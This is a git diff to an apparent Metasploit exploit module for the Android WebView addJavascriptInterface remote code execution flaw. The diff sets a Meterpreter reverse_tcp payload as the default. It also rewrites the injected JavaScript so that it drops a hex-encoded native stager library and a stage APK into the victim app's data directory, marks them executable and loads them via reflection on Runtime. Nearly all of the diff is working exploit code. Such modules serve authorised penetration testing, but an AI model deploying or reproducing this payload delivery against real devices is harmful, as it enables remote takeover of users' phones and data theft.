diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 40c5461117..344403fd8e 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -58,9 +58,9 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'DefaultOptions' => { 'PrependFork' => true }, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'Targets' => [ [ 'Automatic', {} ] ], 'DisclosureDate' => 'Dec 21 2012', 'DefaultTarget' => 0, @@ -86,6 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote send_response_html(cli, html) end + def dalvikstager() + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libdalvikstager.so') + data = File.read(localfile, {:mode => 'rb'}) + data + end + def js %Q| function exec(obj) { @@ -94,18 +100,26 @@ class Metasploit3 < Msf::Exploit::Remote // get the runtime so we can exec var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); - var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}"; + var runtime = m.invoke(null, null); + var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; + var libraryData = "#{Rex::Text.to_hex(dalvikstager, '\\\\x')}"; // get the process name, which will give us our data path - var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); + var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); } - path += '/#{Rex::Text.rand_text_alpha(8)}'; + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; + var stagePath = path + '/stage.apk'; - // build the binary, chmod it, and execute it - m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor(); - m.invoke(null, null).exec(['chmod', '700', path]).waitFor(); - m.invoke(null, null).exec([path]); + // build the library and chmod it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); + runtime.exec(['chmod', '700', libraryPath]).waitFor(); + + // build the stage, chmod it, and load it + runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor(); + runtime.exec(['chmod', '700', stagePath]).waitFor(); + + runtime.load(libraryPath); return true; }